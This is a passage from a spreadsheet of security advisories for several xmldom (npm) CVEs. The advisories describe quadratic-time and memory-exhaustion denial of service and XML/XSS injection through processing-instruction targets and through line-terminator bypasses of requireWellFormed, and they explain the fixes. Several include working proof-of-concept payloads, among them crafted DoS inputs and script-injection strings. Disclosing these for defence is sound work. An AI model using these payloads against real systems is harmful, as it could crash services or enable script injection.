and independent of `requireWellFormed`; ships on both maintained versions.</t></is></c><c r="T1623" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83613</t></is></c></row><row r="1624"><c r="A1624" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1624" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1624" s="5" t="inlineStr"><is><t>CVE-2026-83614</t></is></c><c r="D1624" s="5" t="inlineStr" /><c r="E1624" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1624" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1624" s="5" t="inlineStr" /><c r="H1624" s="5" t="n"><v>0.004</v></c><c r="I1624" s="5" t="inlineStr" /><c r="J1624" s="5" t="inlineStr" /><c r="K1624" s="5" t="inlineStr" /><c r="L1624" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1624" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N1624" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1624" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1624" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1624" s="5" t="inlineStr" /><c r="R1624" s="5" t="inlineStr" /><c r="S1624" s="5" t="inlineStr"><is><t>## Summary

`xmldom`'s malformed-input **error-recovery path** has two quadratic-time (O(n²)) behaviors that a
single crafted input triggers together, so a tiny, highly compressible document (tens of KB) stalls
the Node.js event loop for multiple seconds. It is reachable from `DOMParser.parseFromString` under
**default options** — i.e. from unauthenticated, network-delivered XML — making this an unauthenticated
denial of service. One of the two behaviors, the `normalize()` adjacent-text merge, is **additionally
reachable programmatically** — via a plain `normalize()` call on a DOM built with adjacent text nodes,
independent of the parser — so its fix must live in `normalize()`, not only in a parser bound.

## Details

### Finding A — `parseElementStartPart` quadratic re-scan

A `&lt;` character is not a delimiter in any tag-parsing state, so `parseElementStartPart` scans
forward character-by-character over any embedded `&lt;` until it reaches the next `&gt;` (or end of
input), then validates the accumulated slice as a tag name and throws `invalid tagName:` on failure.
The main loop catches this, reports an `error`, sets `end = -1`, and recovers by advancing a single
character (`appendText(Math.max(tagStart, start) + 1)`). With a long run of `&lt;` and a distant `&gt;`,
each of the O(n) recovery retries performs an O(n) scan plus an O(n) anchored regex validation over
the growing candidate ⇒ **O(n²)**.

Code (0.9.x, `bb7a085dc5ba1eea3212388509b97bb4b4af32b9`):

- `parseElementStartPart` character scan — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L263-L461
- tag-name validation (`setTagName` → throws `invalid tagName`) — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L886-L891
- main-loop `catch` → `error` + `end = -1` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L234-L242
- single-character recovery fallback — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L247

Code (0.8.x, `e5c14802592685bb872c042c54c3f73758875c85`):

- `parseElementStartPart` — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L227
- `catch` → `error` + `end = -1` — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L202-L208
- recovery fallback — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L213
- `setTagName` validation — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L616-L621

### Finding B — `normalize()` adjacent-text O(K²) merge

`endDocument()` calls `document.normalize()`. For a parent with K adjacent text nodes (produced by
the one-character recovery of Finding A), `normalize()` performs K−1 merges. Each merge does a
`removeChild` — which re-indexes **all** child nodes of the parent (O(K)) — and an `appendData` —
which rebuilds the accumulator string `this.data + text` (O(K)). Total: **O(K²)**.

Well-formed XML cannot produce adjacent text-node siblings *through the parser* (each text run is one
node; comments, CDATA, PIs, and elements sit between runs), so the **parse-path** trigger for Finding B
is the malformed-input recovery that emits single-character text nodes. The same O(K²) merge is,
however, independently reachable via the public `normalize()` API on a programmatically built tree
(see "Finding B is additionally reachable programmatically" below).

Code (0.9.x, `bb7a085dc5ba1eea3212388509b97bb4b4af32b9`):

- `endDocument` → `normalize()` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom-parser.js#L418-L420
- `normalize()` adjacent-text merge — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L1336-L1356
- `removeChild` re-index-all branch — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L1788-L1798
- `appendData` string rebuild — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L2786-L2790

Code (0.8.x, `e5c14802592685bb872c042c54c3f73758875c85`):

- `endDocument` → `normalize()` — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom-parser.js#L213-L214
- `normalize()` merge — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L529-L549
- `removeChild` re-index-all branch — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L756-L773
- `appendData` string rebuild — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L1533

### Finding B is additionally reachable programmatically (no parser involved)

`Node.prototype.normalize()` is public API on every `Document`/`Element`. A tree built entirely through
the ordinary DOM API — `new DOMImplementation().createDocument(...)`, then K× `createTextNode` +
`appendChild` on one parent — reaches the **same** O(K²) merge when the application calls `normalize()`,
with **no** parsing and **no** error-recovery. The parser is only *one* of the two callers of the
vulnerable merge:

- the parser's automatic `endDocument()` → `document.normalize()` (the parse-path trigger above), and
- any explicit application call to the public `normalize()` on a tree with adjacent text nodes.

`XMLSerializer` does **not** call `normalize()`, so serializing an un-merged tree is O(total text), not
O(K²); the O(K²) surface is exactly those two `normalize()` callers. Consequently a parser-side bound
alone cannot remediate Finding B — the fix must live in `normalize()`.

## Affected Versions

Both findings are present across the full published `@xmldom/xmldom` history — both
currently-maintained versions (`0.8.x` and `0.9.x`) are affected — and across the retired unscoped
`xmldom` line. Finding B's `normalize()` merge is additionally reachable **programmatically**: a
direct `normalize()` call on a DOM built with adjacent text nodes hits the same O(K²) merge,
independent of the parser — so, unlike Finding A, it does not require the malformed-input recovery
path.

## Proof of Concept

Default `DOMParser`, no options. The input is trivially compressible (`a&lt;` / `a&lt;&gt;` repeated) and
never throws — it is parsed via the recovery path.

```js
const { DOMParser } = require('@xmldom/xmldom');

// Silence the expected `error`-level recovery reports (default handler logs
// them to console.error without throwing; only fatalError throws).
console.error = function () {};

function timeParse(label, xml, mime) {
  const t0 = process.hrtime.bigint();
  new DOMParser().parseFromString(xml, mime); // completes; no exception
  const ms = Number(process.hrtime.bigint() - t0) / 1e6;
  console.log(label + '  bytes=' + Buffer.byteLength(xml) + '  time=' + ms.toFixed(1) + ' ms');
}

for (const N of [4000, 8000, 16000, 32000]) {
  // Finding A: long re-scans, O(n^2) during parse.
  timeParse('A N=' + N, '&lt;r&gt;' + 'a&lt;'.repeat(N) + '&lt;/r&gt;', 'text/xml');
  // Finding B: short re-scans (cheap parse) but K adjacent text nodes -&gt; O(K^2) in normalize().
  timeParse('B N=' + N, '&lt;r&gt;' + 'a&lt;&gt;'.repeat(N) + '&lt;/r&gt;', 'text/html');
  // Combined: ONE input hits both A and B under the default parser.
  timeParse('C N=' + N, '&lt;r&gt;' + 'a&lt;'.repeat(N) + '&lt;/r&gt;', 'text/xml');
}
```

Measured on Node v18.20.8 (absolute ms vary by host; the load-bearing fact is that doubling the
input ~quadruples the time — canonical O(n²)):

Finding A, isolated (`"&lt;r&gt;" + "a&lt;"×N + "&lt;/r&gt;"`, normalize disabled to isolate the re-scan):

| N | input bytes | `@xmldom/xmldom` 0.9.10 | 0.8.13 |
|--:|--:|--:|--:|
| 2000 | 4007 | 43 ms | 37 ms |
| 4000 | 8007 | 129 ms | 106 ms |
| 8000 | 16007 | 434 ms | 424 ms |
| 16000 | 32007 | 1629 ms | 1611 ms |

Finding B, isolated (`"&lt;r&gt;" + "a&lt;&gt;"×N + "&lt;/r&gt;"`, time attributable to `normalize()`):

| K (N) | input bytes | 0.9.10 | 0.8.13 |
|--:|--:|--:|--:|
| 4000 | 12007 | 120 ms | 165 ms |
| 8000 | 24007 | 589 ms | 771 ms |
| 16000 | 48007 | 3142 ms | 4448 ms |
| 32000 | 96007 | 12127 ms | 12951 ms |

Combined (default parser, both findings; `"&lt;r&gt;" + "a&lt;"×N + "&lt;/r&gt;"`):

| N | input bytes | 0.9.10 | 0.8.13 |
|--:|--:|--:|--:|
| 4000 | 8007 | 341 ms | 397 ms |
| 8000 | 16007 | 1894 ms | 1641 ms |
| 16000 | 32007 | 4398 ms | 7661 ms |

~32 KB of input → several seconds of single-threaded event-loop stall.

### Finding B via the public `normalize()` API (no parser)

```js
const { DOMImplementation } = require('@xmldom/xmldom');

function timeNormalize(K) {
  const doc = new DOMImplementation().createDocument(null, 'r', null);
  const el = doc.documentElement;
  for (let i = 0; i &lt; K; i++) el.appendChild(doc.createTextNode('x')); // K adjacent text nodes
  const t0 = process.hrtime.bigint();
  doc.normalize();                                    // O(K^2) merge — no parsing involved
  const ms = Number(process.hrtime.bigint() - t0) / 1e6;
  console.log('K=' + K + '  time=' + ms.toFixed(1) + ' ms');
}
for (const K of [2000, 4000, 8000, 16000, 32000]) timeNormalize(K);
```

Measured on Node v18.20.8 (doubling K ~quadruples the time — O(K²)):

| K | 0.9.10 | 0.8.13 |
|--:|--:|--:|
| 2000 | 5.7 ms | 5.6 ms |
| 32000 | 1263 ms | 1704 ms |

This path is reachable by any application that builds a DOM from attacker-influenced data and calls
`normalize()`, entirely independent of `DOMParser`.

## Impact

Availability only: a single parse of a small crafted document blocks the Node.js event loop for the
duration of the quadratic work (multiple seconds at tens of KB; larger inputs scale as O(n²)). No
memory blow-up beyond transient strings, no data exposure, no integrity impact. Because XML is
routinely accepted from untrusted sources and parsed with default options, one request can stall a
server. The payloads are highly compressible, so any endpoint accepting compressed XML faces
additional amplification. Finding B is additionally reachable via an explicit `normalize()` call on a
programmatically built DOM (see Proof of Concept), so applications that construct a document from attacker-influenced
data and normalize it are exposed even without parsing.

## Severity note

The complexity is **quadratic**, not exponential, so a multi-second stall requires
tens-to-hundreds of KB of input. `VA:H` reflects that xmldom applies **no** input-size limit and the
path runs on default-options parsing, so a single unbounded parse can fully stall the event loop.

## Fix Applied

Two independent, non-breaking fixes shipped together — each alone leaves the other's quadratic cost dominating the default parse.
Finding A — terminate the malformed tag-name scan at an embedded `&lt;`, so error recovery is linear instead of O(n²). DOM output is unchanged; only the reported error-message text differs (error strings are not a semver contract).
Finding B — merge adjacent text nodes in `normalize()` in O(K) instead of O(K²), which also closes the same slowdown reachable programmatically through a direct `normalize()` call. Both ship on both maintained versions.</t></is></c><c r="T1624" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83614</t></is></c></row><row r="1625"><c r="A1625" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1625" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1625" s="5" t="inlineStr"><is><t>CVE-2026-83615</t></is></c><c r="D1625" s="5" t="inlineStr" /><c r="E1625" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1625" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1625" s="5" t="inlineStr" /><c r="H1625" s="5" t="n"><v>0.004</v></c><c r="I1625" s="5" t="inlineStr" /><c r="J1625" s="5" t="inlineStr" /><c r="K1625" s="5" t="inlineStr" /><c r="L1625" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1625" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N1625" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1625" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1625" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1625" s="5" t="inlineStr" /><c r="R1625" s="5" t="inlineStr" /><c r="S1625" s="5" t="inlineStr"><is><t>## Summary

When an element declares a namespace prefix, xmldom copies the entire in-scope namespace map
into a fresh object and keeps that copy on the element while it is open on the parse stack. A
crafted document that nests N elements, each declaring one unique prefix, therefore drives the
parser to hold on the order of N(N+1)/2 = **O(N²) namespace-map entries at its peak**, so a small,
highly compressible input exhausts the heap. Parsing runs under default options on untrusted,
network-delivered XML, so a sub-megabyte payload can OOM-crash the process before any
application-level validation runs — an unauthenticated denial of service.

## Details

`appendElement` performs the copy: `_copy` clones the current namespace map into a fresh object for
each prefix-declaring element, and the copy is retained on that element's parse-stack entry:

```js
if (localNSMap == null) {
    localNSMap = Object.create(null);
    _copy(currentNSMap, (currentNSMap = Object.create(null)));   // full copy of all ancestor prefixes
}
currentNSMap[nsPrefix] = localNSMap[nsPrefix] = value;
...
el.currentNSMap = currentNSMap;   // retained while the element is open on the parse stack
```

https://github.com/xmldom/xmldom/blob/08a22d78e4bc50f12ce9f5090b8d96ee6031ac7b/lib/sax.js#L467-L540

The copies stack: the element at depth `i` copies a map of size ~`i`, and every ancestor stays live
on the parse stack until it closes, so at the deepest point Σ`i` namespace entries are held at once.
That peak is transient — the completed DOM retains only O(N), one small namespace map per node — but
it is reached during parsing, which is what OOM-crashes the process.

## Proof of Concept

A minimal document — N nested elements, each declaring one unique namespace prefix (no SAML wrapper
needed):

```js
const { DOMParser } = require('@xmldom/xmldom');

function build(n) {
  let open = '', close = '';
  for (let i = 0; i &lt; n; i++) { open += `&lt;a xmlns:p${i}="urn:${i}"&gt;`; close = '&lt;/a&gt;' + close; }
  return `&lt;r&gt;${open}${close}&lt;/r&gt;`;   // &lt;r&gt;&lt;a xmlns:p0="urn:0"&gt;...&lt;a xmlns:p{n-1}="urn:{n-1}"&gt;...&lt;/a&gt;...&lt;/r&gt;
}

for (const n of [2000, 4000, 8000, 16000]) {
  const src = build(n);
  new DOMParser().parseFromString(src, 'text/xml');   // peak memory ~ O(n^2)
  console.log(n, (src.length / 1024).toFixed(0) + ' KB in', (process.resourceUsage().maxRSS / 1024).toFixed(0) + ' MB peak RSS');
}
```

Measured on Node.js v24 (peak RSS ~quadruples per doubling of depth; absolute numbers vary by host):

| depth  | input   | peak RSS                        |
| -----: | ------: | ------------------------------- |
|  2,000 |  56 KB  | 266 MB                          |
|  4,000 | 115 KB  | 622 MB                          |
|  8,000 | 232 KB  | 1.9 GB                          |
| 16,000 | ~470 KB | OOM crash (default ~4 GB heap)  |

About 470 KB of trivially-generated, highly-compressible input crashes a default Node.js process;
larger depths scale as O(N²) into the tens of GB, crashing larger hosts (as first measured by the
reporter with a SAML-shaped payload).

## Impact

Unauthenticated denial of service against any service that parses attacker-influenced XML with
xmldom under default options. A single sub-megabyte request drives multi-gigabyte peak memory and
can OOM-crash the process before any application-level validation (e.g. schema checks or a SAML
signature verification) runs. The payload is a plain namespace-nesting document and highly
compressible, so it is effective over compressed transports (e.g. an HTTP-Redirect / DEFLATE
binding, not only POST bindings).

## Severity note

The CVSS 4.0 vector scores availability only (`VC:N/VI:N/VA:H`): the flaw neither discloses nor
alters data, it exhausts the heap. `VA:H` is justified because a single unauthenticated,
network-delivered request (`AV:N/PR:N/UI:N`) of trivial complexity (`AC:L/AT:N`) drives the parser
to multi-gigabyte peak memory and OOM-crashes the process before any application-level logic runs —
a full loss of availability for the affected service.

## Fix Applied

Inherit each element's in-scope namespace map through the prototype chain instead of copying it for every prefix-declaring element, so a deeply namespaced document holds O(N) namespace entries instead of O(N²) at peak. Behavior-preserving: serialized output is byte-identical, only the memory cost drops. Non-breaking and independent of `requireWellFormed`; ships on both maintained versions.</t></is></c><c r="T1625" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83615</t></is></c></row><row r="1626"><c r="A1626" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1626" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1626" s="5" t="inlineStr"><is><t>CVE-2026-83616</t></is></c><c r="D1626" s="5" t="inlineStr" /><c r="E1626" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1626" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1626" s="5" t="inlineStr" /><c r="H1626" s="5" t="n"><v>0.003</v></c><c r="I1626" s="5" t="inlineStr" /><c r="J1626" s="5" t="inlineStr" /><c r="K1626" s="5" t="inlineStr" /><c r="L1626" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1626" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N1626" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1626" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1626" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1626" s="5" t="inlineStr" /><c r="R1626" s="5" t="inlineStr" /><c r="S1626" s="5" t="inlineStr"><is><t>## Summary

`Document.createProcessingInstruction()` in `@xmldom/xmldom` performs no validation on the `target` parameter. The `requireWellFormed: true` serializer option validates only for `:` in the target and a case-insensitive `xml` prefix, but does not check for `&gt;` characters. A `&gt;` in the target breaks the processing instruction boundary (`&lt;?...?&gt;`), allowing injection of arbitrary content into the serialized XML output.

## Details

`Document.createProcessingInstruction(target, data)` at `lib/dom.js` around line 2413 accepts any string as the `target` parameter and stores it on the PI node without validation.

During serialization, the `requireWellFormed` code path (around line 3286) performs two checks on PI targets:

1. Rejects targets containing `:` (namespace prefix check)
2. Rejects targets matching `xml` case-insensitively (reserved prefix)

However, it does NOT validate that the target conforms to the XML Name production, and critically does NOT check for `&gt;` characters. Since processing instructions are serialized as `&lt;?target data?&gt;`, a `&gt;` in the target prematurely closes the PI, causing the remaining content to be interpreted as document content by any downstream XML parser.

### Root Cause

1. `createProcessingInstruction()` performs no validation on `target`
2. The serializer's `requireWellFormed` check is incomplete -- it only checks for `:` and `xml`, missing characters that break PI syntax (`&gt;`, `?`, whitespace)
3. The serializer emits the target verbatim: `&lt;?${target} ${data}?&gt;`

## Proof of Concept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const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// Output: &lt;root&gt;&lt;?a&gt; data?&gt;&lt;/root&gt;
//
// The &gt; in the target closes the PI prematurely.
// A downstream XML parser sees:
//   - Processing instruction: &lt;?a?&gt;  (target "a", no data)
//   - Text content: " data?&gt;"
//
// requireWellFormed: true did NOT prevent the injection.
```

### Injecting elements via PI target

```javascript
const pi2 = doc.createProcessingInstruction(
  'a?&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;?b',
  ''
);
doc.documentElement.appendChild(pi2);

const output2 = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output2);
// Output includes:
//   &lt;?a?&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;?b ?&gt;
//
// The injected &lt;script&gt; element is valid XHTML that a browser would execute.
```

## Impact

Applications that create processing instructions with user-controlled target strings and serialize the result are vulnerable to XML injection. This enables:

- **XML structure injection**: Breaking the PI boundary to inject arbitrary elements, text, or additional processing instructions into the output
- **XSS via XHTML**: If the serialized output is served as XHTML or processed by a browser-based XML parser, injected script elements will execute
- **XXE chain**: Injected DOCTYPE declarations or entity references could trigger XXE in downstream XML parsers that consume the output
- **requireWellFormed bypass**: The existing well-formedness checks are incomplete and provide a false sense of security

## Fix Applied

Under `requireWellFormed`, the serializer validates a processing-instruction target as an XML `NCName` (a `Name` with no colon) and rejects a case-insensitive `xml`, throwing `InvalidStateError` when the target is ill-formed — so a `&gt;`, `?`, or whitespace in the target is now refused.\
On 0.9.12 this replaces an earlier check that already rejected a colon or `xml`, so the no-colon rule is preserved.\
0.8.15 had no processing-instruction target check at all, so the whole target validation is new there.\
Non-breaking and opt-in.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 Default path: emits the ill-formed target verbatim.
console.log(serializer.serializeToString(doc));
// Output: &lt;root&gt;&lt;?a&gt; data?&gt;&lt;/root&gt;

// Opt-in path: the target check now rejects the break-out character.
try {
  serializer.serializeToString(doc, { requireWellFormed: true });
} catch (e) {
  console.log(e.name); // InvalidStateError
}
```

### Why the default stays verbatim

W3C DOM Parsing's require-well-formed flag defaults to false, and the browser `XMLSerializer` emits the target verbatim in that default mode. Unconditionally throwing on an ill-formed PI target would diverge from that platform behavior and would be an unjustified breaking change, so the stricter validation is gated behind `{ requireWellFormed: true }`. (See the [W3C XML Name production](https://www.w3.org/TR/xml/#NT-Name) and [XML Processing Instructions](https://www.w3.org/TR/xml/#sec-pi).)

### Residual limitation

The default serialization path still emits the ill-formed target verbatim -- only the opt-in `requireWellFormed` path is protected. Creation-time validation of the `target` in `createProcessingInstruction()` is breaking and is deferred to the next breaking release, tracked at [xmldom/xmldom#1073](https://github.com/xmldom/xmldom/issues/1073).</t></is></c><c r="T1626" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83616</t></is></c></row><row r="1627"><c r="A1627" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1627" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1627" s="5" t="inlineStr"><is><t>CVE-2026-83617</t></is></c><c r="D1627" s="5" t="inlineStr" /><c r="E1627" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1627" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1627" s="5" t="inlineStr" /><c r="H1627" s="5" t="n"><v>0.003</v></c><c r="I1627" s="5" t="inlineStr" /><c r="J1627" s="5" t="inlineStr" /><c r="K1627" s="5" t="inlineStr" /><c r="L1627" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M1627" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N1627" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1627" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1627" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1627" s="5" t="inlineStr" /><c r="R1627" s="5" t="inlineStr" /><c r="S1627" s="5" t="inlineStr"><is><t>## Summary

An embedded line terminator bypasses the `requireWellFormed` serializer check for element and
attribute names. The check was added to fix GHSA-w2rr-34g9-rvrj and GHSA-4w3w-2rp5-g8jm; a name whose
first line is well-formed slips past it and is serialized verbatim, so the characters after the line
terminator break out of the start/end tag or attribute. Callers who enabled `requireWellFormed`
specifically to neutralize those name-injection issues remain exposed.

## Details

xmldom builds every grammar production through a shared regexp builder that compiles with the `m`
flag. The anchored full-string matcher used for element and attribute names, `QName_exact =
reg('^', QName, '$')`, therefore inherits `m`. When it is applied as `QName_exact.test(name)` against
an already-assembled node name, the `m` flag makes `$` match at an interior line terminator, so the
matcher accepts any value in which **at least one line** is a valid `QName`; the other lines are never
constrained. A payload whose first line is a valid `QName`, followed by a line terminator and breakout
markup, is what yields a working injection.

The serializer emits the accepted name verbatim into element start/end tags and attribute names, so
the bytes after the line terminator break out of the intended syntactic position. The check is
reached whenever a caller serializes, with `requireWellFormed: true`, a node whose name was set
through programmatic DOM construction (`createElement`, `createElementNS`, `createAttribute`,
`createAttributeNS`) with attacker-influenced input.

### Root Cause

1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. A full-string validator built on such a production (`.test()`) accepts any string with one
   conforming line, so a line terminator followed by breakout markup passes.

The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

// Element name carrying an embedded line terminator + breakout markup:
const doc = new DOMImplementation().createDocument(null, 'root', null);
const el = doc.createElement('a\n&gt;&lt;script&gt;alert(1)&lt;/script');
doc.documentElement.appendChild(el);

// Caller opted into well-formed serialization, expecting invalid names to be rejected:
console.log(new XMLSerializer().serializeToString(doc, { requireWellFormed: true }));
// Observed on the affected version: NO throw; the output contains the injected `&gt;&lt;script&gt;…`
// breakout, because the name's first line ("a") satisfies the m-anchored QName check.
// Expected: InvalidStateError (the name is not a valid XML QName).

// Control — a single-line invalid name IS correctly rejected, proving the check is active and
// that only the line terminator defeats it:
const ctrl = new DOMImplementation().createDocument(null, 'root', null);
ctrl.documentElement.appendChild(ctrl.createElement('a b'));
new XMLSerializer().serializeToString(ctrl, { requireWellFormed: true });
// =&gt; throws InvalidStateError: The element name "a b" is not a valid XML QName
```

## Impact

- **Bypass of a previously shipped security mitigation.** Applications that adopted
  `requireWellFormed: true` specifically to neutralize GHSA-w2rr-34g9-rvrj / GHSA-4w3w-2rp5-g8jm
  remain exposed to element/attribute name injection.
- **XML / markup structure injection**, and, where the serialized output is placed into an HTML
  context, downstream XSS.

## Fix Applied

The anchored XML `Name`/`QName` validators used by the `requireWellFormed` serializer no
longer treat interior line terminators as satisfying the anchors, so a name is validated against the
whole string. A name containing a line terminator is rejected with `InvalidStateError`, closing the
bypass for element and attribute names. The default serialization path is unchanged.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```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const doc = new DOMImplementation().createDocument(null, 'root', null);
const el = doc.createElement('a\n&gt;&lt;script&gt;alert(1)&lt;/script');
doc.documentElement.appendChild(el);

// Default path (require-well-formed off) — unchanged, still emits the name verbatim,
// so the `&gt;&lt;script&gt;…` bytes break out of the start tag:
new XMLSerializer().serializeToString(doc);

// Opted-in path — now rejected:
new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
// throws InvalidStateError: The element name "a\n&gt;&lt;script&gt;alert(1)&lt;/script" is not a valid XML QName
```

### Why the default stays verbatim

The W3C DOM Parsing require-well-formed flag defaults to false, and browser `XMLSerializer` emits
names verbatim when it is unset. Throwing unconditionally would be an unjustified breaking change, so
the check stays gated on the caller opting in with `{ requireWellFormed: true }`.

### Residual limitation

The default serialization path (no `requireWellFormed`) still emits names verbatim by design (above).
Names introduced through `createElement` / `setAttribute` are never validated at creation — those APIs
store the name unchecked by design — so the opt-in serializer check remains the only guard on that
path.</t></is></c><c r="T1627" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83617</t></is></c></row><row r="1628"><c r="A1628" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1628" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1628" s="5" t="inlineStr"><is><t>CVE-2026-83618</t></is></c><c r="D1628" s="5" t="inlineStr" /><c r="E1628" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1628" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1628" s="5" t="inlineStr" /><c r="H1628" s="5" t="n"><v>0.003</v></c><c r="I1628" s="5" t="inlineStr" /><c r="J1628" s="5" t="inlineStr" /><c r="K1628" s="5" t="inlineStr" /><c r="L1628" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M1628" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N1628" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1628" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1628" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1628" s="5" t="inlineStr" /><c r="R1628" s="5" t="inlineStr" /><c r="S1628" s="5" t="inlineStr"><is><t>## Summary

An embedded line terminator bypasses the `requireWellFormed` serializer check for a `DocumentType`'s
publicId and systemId. The check was added to fix GHSA-f6ww-3ggp-fr8h; an id whose first line is a
valid literal slips past it and is emitted verbatim into the `&lt;!DOCTYPE …&gt;` declaration, so the markup
after the line terminator breaks out into the surrounding document. Callers who enabled
`requireWellFormed` to neutralize DocumentType injection remain exposed.

## Details

`publicId` and `systemId` are stored as raw values **including their surrounding quotes**, and the
`PubidLiteral`/`SystemLiteral` productions include those quotes. The serializer validates them with
`g.PubidLiteral_match.test(publicId)` and `g.SystemLiteral_match.test(systemId)`, where both matchers
are `reg('^', …, '$')` and inherit the `m` flag from xmldom's shared regexp builder. Under `m`, `$`
matches at an interior line terminator, so a value such as `"valid pubid"\n"&gt;&lt;!ENTITY …&gt;` satisfies
the matcher on its first line (`"valid pubid"` is a complete `PubidLiteral`) and the whole value —
including the post-newline breakout — is emitted after `PUBLIC`/`SYSTEM`.

### Root Cause

1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. A full-string validator built on such a production (`.test()`) accepts any string with one
   conforming line, so a complete, valid literal on the first line passes even though a line terminator
   and breakout markup follow. `PubidChar` excluding `&lt;`/`&gt;` does not prevent it — the breakout is
   appended *after* the literal, not embedded inside it.

The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.

## Affected Versions

Only `@xmldom/xmldom` 0.9.x is affected. The vulnerable matchers are built by `lib/grammar.js`'s
`m`-flagged `reg()` builder, and the DocType `publicId`/`systemId` `requireWellFormed` check that
consumes them was introduced in 0.9.10 (the GHSA-f6ww-3ggp-fr8h fix); 0.9.10 and 0.9.11 carry it.
`0.8.x` performs the same `requireWellFormed` check with inline, non-`m` regular expressions and is not
